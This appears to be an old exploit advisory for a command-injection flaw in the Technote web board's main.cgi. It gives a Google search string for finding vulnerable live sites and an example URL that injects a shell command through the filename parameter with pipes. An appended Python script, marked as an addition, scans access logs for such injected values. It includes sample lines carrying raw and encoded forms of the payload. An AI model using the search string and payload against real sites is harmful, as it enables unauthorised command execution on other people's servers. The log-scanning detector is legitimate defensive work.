Technote Command Execution


Technote Inc. from Korea offers a Site Package which includes a web board.

A previous exploit, discovered back in 2000, focused on a File
Disclosure Vulnerability:
http://www.securityfocus.com/bid/2156/discussion/


However, command execution is also possible using the same vulnerable script.


Example...

Google for "allinurl:technote/main.cgi*filename=*"


You'll get something like:

something.co.kr/.../shop.pdf?down_num=5466654&
board=rebarz99&command=down_load&filename=cc.pdf


Change cc.pdf to the name of a non-existent file and pipe a command:

something.co.kr/.../shop.pdf?down_num=5466654&
board=rebarz99&command=down_load&filename=rb9.txt|id|
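
Requests of this shape are visible in web server access logs. The following is an added example, not part of the original advisory: it scans access-log lines for filename= values that carry shell metacharacters such as the pipe shown above, including percent-encoded forms. The log format, the /technote/main.cgi path, the client addresses and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, unquote

# Characters with no place in a download filename: shell metacharacters,
# path separators and control bytes. The pipe is the one the advisory uses.
SUSPICIOUS = re.compile(r"[|;&`$<>\\/\x00-\x1f]")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def filename_values(target):
    """Yield each decoded filename= value found in a request target."""
    query = target.partition("?")[2]
    for value in parse_qs(query, keep_blank_values=True).get("filename", []):
        # parse_qs decodes once; decode again to catch %257C-style
        # double encoding that an intermediate layer might unwrap.
        yield unquote(value)

def scan(log_lines):
    """Return (line_number, decoded_filename) for each suspicious request."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue  # not a request line in the assumed log format
        for value in filename_values(match.group(1)):
            if SUSPICIOUS.search(value) or ".." in value:
                hits.append((number, value))
    return hits

def _line(ip, filename):
    # Constructed sample entry; path and log format are assumptions.
    return (f'{ip} - - [01/Jan/2004:10:00:00 +0000] "GET /technote/main.cgi'
            f'?down_num=5466654&board=rebarz99&command=down_load'
            f'&filename={filename} HTTP/1.0" 200 512')

SAMPLE_LOG = [
    _line("192.0.2.10", "cc.pdf"),                # ordinary download
    _line("192.0.2.11", "rb9.txt|id|"),           # raw pipe
    _line("192.0.2.12", "rb9.txt%7Cid%7C"),       # percent-encoded pipe
    _line("192.0.2.13", "rb9.txt%257Cid%257C"),   # double-encoded pipe
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: suspicious filename value {value!r}")
```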



-RB9

Greetz to PhTeam members PATz, Luvchr|s, Verum, Fed-X, rebarz99, hEps,
ch1m3ra, and others who refused to be mentioned :)